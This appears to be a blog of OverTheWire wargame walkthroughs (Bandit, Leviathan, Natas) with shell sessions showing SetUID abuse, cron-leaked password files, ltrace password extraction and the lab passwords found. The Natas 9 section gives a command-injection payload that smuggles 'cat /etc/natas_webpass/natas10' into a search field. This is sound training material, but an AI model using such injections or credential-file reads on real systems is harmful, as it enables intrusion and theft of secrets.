Skip to main content

47 posts tagged with "overthewire"

View All Tags

Bandit Level 19 → 20

Shubham
Cybersecurity Enthusiast

Login: ssh bandit19@bandit.labs.overthewire.org -p 2220
Password: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

task

The password for the next level is stored in /etc/bandit_pass/bandit20. To access it, you must use a SetUID binary located in the home directory called bandit20-do.

theory lil bit

  1. SetUID (Set User ID): This is a special type of file permission in Unix-like systems. When an executable with the SetUID bit is run, it executes with the privileges of the file's owner rather than the person running it.
  2. bandit20-do: In this level, this binary is owned by bandit20. Because it has the SetUID bit set, any command we pass to it will be executed as the bandit20 user.
  3. Privilege Escalation: This is a classic example of using a legitimate (but powerful) utility to perform actions your current user isn't allowed to do—like reading a password file restricted to the next level's user.

solution

bandit19@bandit:~$ ls
bandit20-do
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
Example: ./bandit20-do whoami
bandit19@bandit:~$ ./bandit20-do whoami
bandit20
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO

`

Bandit Level 20 → 21

Shubham
Cybersecurity Enthusiast

Login: ssh bandit20@bandit.labs.overthewire.org -p 2220
Password: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO

task

There is a SetUID binary in the home directory that connects to localhost on a specified port. It reads the current password from the connection and, if correct, sends back the password for the next level.

theory lil bit

  1. nc (netcat): Often called the "Swiss-army knife" of networking. We use it here to set up a listening server (-l) on a specific port (-p).
  2. suconnect binary: This program acts as a client. It expects to find a service listening on the port you provide. Once connected, it waits for the current level's password to be sent to it.
  3. Multitasking/Backgrounding: Since both the listener (nc) and the client (suconnect) need to run at the same time on the same machine, you either need two SSH sessions or to run the listener in the background using &.

solution

To solve this, we need two separate terminal instances or a way to run processes in parallel.

Terminal 1 (Setting up the listener): We tell netcat to listen on port 4444. Once the connection is established, we will paste the current password.

bandit20@bandit:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444

Terminal 2 (Executing the client): While Terminal 1 is listening, we run the provided binary and point it to our listening port.

bandit20@bandit:~$ ./suconnect 4444

Back in Terminal 1: The connection will be received. You must then manually type or paste the password for Level 20. If it matches what the binary expects, it will send the Level 21 password back to you.

Connection received on 127.0.0.1 54086
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
EeoULMCra2q0dSkYj561DX7s1CpBuOBt

`

Bandit Level 21 → 22

Shubham
Cybersecurity Enthusiast

Login: ssh bandit21@bandit.labs.overthewire.org -p 2220
Password: EeoULMCra2q0dSkYj561DX7s1CpBuOBt

task

A program is running automatically at regular intervals from cron, the system-wide job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

theory lil bit

  1. Cron: A time-based job scheduler in Unix-like operating systems. It enables users to schedule jobs (commands or shell scripts) to run periodically at fixed times, dates, or intervals.
  2. /etc/cron.d/: This directory contains system-wide cron jobs. Each file here usually specifies the user that runs the command and the command itself.
  3. Shell Scripts (.sh): These are text files containing a series of commands. When executed, the system runs each command in the file one by one.
  4. Redirection (>): In the script, you will see cat file > /tmp/.... This takes the content of the password file and writes it into a temporary file that is readable by others.

solution

# Navigate to the cron configuration directory
bandit21@bandit:~$ cd /etc/cron.d
bandit21@bandit:/etc/cron.d$ ls
cronjob_bandit22

# Read the cron configuration file
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

# Read the script being executed by the cron job
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

# Since the script runs every minute, the password is already in the temp file
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q

`

Bandit Level 22 → 23

Shubham
Cybersecurity Enthusiast

Login: ssh bandit22@bandit.labs.overthewire.org -p 2220
Password: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q

task

A program is running automatically at regular intervals from cron. Look in /etc/cron.d/ for the configuration and see what command is being executed.

theory lil bit

  1. Shell Variables: In the script, $myname is a variable. When the cron job runs for bandit23, the script sets myname to "bandit23".
  2. MD5 Hashing: The command md5sum creates a unique 32-character fingerprint (hash) of a string. In this level, the script uses the hash of a specific string as a hidden filename in /tmp.
  3. Command Substitution: Using $(command) allows the output of one command to be stored in a variable or used inside another string.
  4. Logic: To find the password, we don't need to run the script. We just need to figure out what the filename would be when the user is bandit23, and then read that file.

solution

# Navigate to the cron directory and check the script
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null

# Analyze the script logic
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget

# Replicate the logic for bandit23 to find the hidden filename
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

# Read the resulting file from the /tmp directory
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

`

Bandit Level 17 → 18

Shubham
Cybersecurity Enthusiast

Bandit 17 to 18

login : ssh -i sshkey17.private -p 2220 bandit17@bandit.labs.overthewire.org
password : (Uses the RSA private key retrieved in the previous level)

Task

There are 2 files in the home directory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new.

Quick theory

When you need to compare the contents of two text files line-by-line, the standard Linux utility is diff. It analyzes both files and outputs the specific lines that differ.

  • < indicates lines unique to the first file specified in the command.
  • > indicates lines unique to the second file specified in the command.

Tools you’ll use:
diff → compares files line by line and prints the differences.
grep → searches for specific patterns within a file (used here to verify which file contained which string).

Solution

bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO
---
> pGozC8kOHLkBMOaL0ICPvLV1IjQ5F1VA

bandit17@bandit:~$ grep x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO passwords.new
x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO

bandit17@bandit:~$ grep pGozC8kOHLkBMOaL0ICPvLV1IjQ5F1VA passwords.new
bandit17@bandit:~$

By running diff passwords.new passwords.old, the output immediately reveals the discrepancy at line 42. Because passwords.new was the first file passed to the command, the string preceded by < (x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO) is the line unique to the new file.

To be absolutely certain, we used grep to search for both strings in passwords.new. The string x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO returns a match, confirming it is the updated password for Bandit18.

`

Bandit Level 18 → 19

Shubham
Cybersecurity Enthusiast

Login: ssh bandit18@bandit.labs.overthewire.org -p 2220
Password: hga5tuuCLF6fFzBgnYw9cB3Srx9_no_a (from Level 17)

task

The password for the next level is stored in a file called readme in the home directory. However, someone has modified .bashrc to log you out immediately when you log in via SSH.

theory lil bit

  1. SSH Command Execution: Normally, when you SSH, the server starts an interactive shell. However, you can append a command at the end of your SSH string (e.g., ssh user@host command). The server will execute that single command and return the output without initiating a full login shell, effectively bypassing the .bashrc logout script.
  2. .bashrc: This is a script file that runs every time an interactive shell is started. In this level, it contains a command like exit or logout, which is why your connection closes immediately upon a standard login.
  3. Pseudo-terminal (-t): Sometimes, if a command requires an interactive interface but is being blocked, forcing a terminal allocation with -t can help, or explicitly calling a different shell like /bin/bash --norc (though standard command execution is usually enough).

solution

Method 1: Direct Command Execution

By appending the command to the end of the SSH login, we bypass the interactive login shell entirely.

# List files to confirm the target
ssh bandit18@bandit.labs.overthewire.org -p 2220 ls
# Output: readme

# Read the file directly
ssh bandit18@bandit.labs.overthewire.org -p 2220 cat readme
# Output: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

Method 2: Requesting a Shell

You can force SSH to start a specific shell instead of the default one, which may avoid the triggers in the user's standard profile.

# Force a bash shell
ssh bandit18@bandit.labs.overthewire.org -p 2220 /bin/bash
ls
readme
cat readme
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

`

Leviathan 0 to 1

Shubham
Cybersecurity Enthusiast

Leviathan 0 to 1

we already know password for leviathan0 so we will login using ssh
ssh leviathan0@leviathan.labs.overthewire.org -p 2223 then type the password leviathan0

now if you see there are no files that means files are hidden
use ls -la command to list the files that are hidden also

leviathan0@leviathan:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Oct 14 09:27 .
drwxr-xr-x 150 root root 4096 Oct 14 09:29 ..
drwxr-x--- 2 leviathan1 leviathan0 4096 Oct 14 09:27 .backup
-rw-r--r-- 1 root root 220 Mar 31 2024 .bash_logout
-rw-r--r-- 1 root root 3851 Oct 14 09:19 .bashrc
-rw-r--r-- 1 root root 807 Mar 31 2024 .profile

here we can clearly see leviathan1 in .backup directory
now change directory to .backup then we have one html file named bookmarks.html, now if you do cat bookmarks.html
thats so long output

leviathan0@leviathan:~/.backup$ cat bookmarks.html | grep leviathan
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is 3QJ3TgzHDq" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

so we used grep to filter

and yeah we got the password to leviathan 1 this was just practice or you say warm up type question, there was no such reverse engineering stuff as such.

`

Leviathan 1 to 2

Shubham
Cybersecurity Enthusiast

Leviathan 1 to 2

login

ssh leviathan1@leviathan.labs.overthewire.org -p 2223 password : 3QJ3TgzHDq

now use ls to look for the files

leviathan1@leviathan:~$ ls
check
leviathan1@leviathan:~$ file check
check: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=990fa9b7d511205601669835610d587780d0195e, for GNU/Linux 3.2.0, not stripped

we also used file check to find out the type of file it is, we found out its elf 32 bit lsb executable

leviathan1@leviathan:~$ strings check | grep leviathan
leviathan1@leviathan:~$ strings check
td8
/lib/ld-linux.so.2
_IO_stdin_used
puts
__stack_chk_fail
system
getchar
__libc_start_main
printf
setreuid
strcmp
geteuid
libc.so.6
GLIBC_2.4
GLIBC_2.34
GLIBC_2.0
__gmon_start__
secr
love
password:
/bin/sh
Wrong password, Good Bye ...
;*2$"0
GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
crt1.o
__abi_tag
__wrap_main
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
check.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
strcmp@GLIBC_2.0
__libc_start_main@GLIBC_2.34
__x86.get_pc_thunk.bx
printf@GLIBC_2.0
getchar@GLIBC_2.0
_edata
_fini
__stack_chk_fail@GLIBC_2.4
geteuid@GLIBC_2.0
__data_start
puts@GLIBC_2.0
system@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
setreuid@GLIBC_2.0
_end
_dl_relocate_static_pie
_fp_hw
__bss_start
__TMC_END__
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.got.plt
.data
.bss
.comment

tried piping the output of strings check into grep leviathan but didnt got anything ... then did string check only without piping ... look there carefully

love
password:
/bin/sh
Wrong password, Good Bye ...

run the file

leviathan1@leviathan:~$ ./check
password: test
Wrong password, Good Bye ...

this means its simple strcmp that is comparing the password you typed with the correct password. so we can simply use ltrace to trace library calls ... ltrace is used to see what library calls are made during binary execution ... library calls are, when a program calls a function from a file that is shared by multiple programs ... for example checking if input is the correct password is done with library function called strcmp .. it will show function and its input parameters, which then include the password

leviathan1@leviathan:~$ ltrace ./check
__libc_start_main(0x80490ed, 1, 0xffffd474, 0 <unfinished ...>
printf("password: ") = 10
getchar(0, 0, 0x786573, 0x646f67password: hello
) = 104
getchar(0, 104, 0x786573, 0x646f67) = 101
getchar(0, 0x6568, 0x786573, 0x646f67) = 108
strcmp("hel", "sex") = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
) = 29
+++ exited (status 0) +++

so clearly visible its comparing our input "hello" with "sex" so correct password is sex.
lets try by running the binary again and checking the password.

leviathan1@leviathan:~$ ./check
password: sex
$

and indeed yes, we got access to the leviathan 2 shell ... as it was written already above in strings ... /bin/sh

now you can simple find the password from:

$ cat /etc/leviathan_pass/leviathan2
NsN1HwFoyN

here we go another leiathan done!

`

Natas Level 8

Shubham
Cybersecurity Enthusiast

Natas 8

Solution

okay so the first thing that will come to our mind while visiting the page will be clicking that View sourcecode button.
when you will visit that page you will find an encoded secret, you have to decode it
but we are given a function in php to encode secret ... so to decode it we will implement that in reverse order

function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}

bin2hex(strrev(base64_encode($secret)) produced 3d3d516343746d4d6d6c315669563362
reverse these steps to get the secret

make sure you have php installed on your pc/laptop ... then execute following commands.

shubhamdchhatbar@shubhams-MacBook-Air ~ % php -a
Interactive shell

php > echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));
oubWYf2kBq
php >

submit this oubWYf2kBq and you will get password for natas 9

`

Natas Level 9

Shubham
Cybersecurity Enthusiast

Natas 9

Solution

first thing you are likely to click here is View sourcecode

there you will see something like this

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}

if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>

here passthru() function is used ... read more about it on https://www.php.net/manual/en/function.passthru.php#127699

since passthru is there we can use command injection ...
basically it is an attack which executes the arbitrary commands on the host operating system via a vulnerable application ... read OWASP Command Injection for more information.

in Find words containing search box
write ;ls -a you will see the files now on the official website it is given that password can be found on etc/natas_webpass/natas*

so we will execute the command ; cat /etc/natas_webpass/natas10; and will get the password for natas 10
`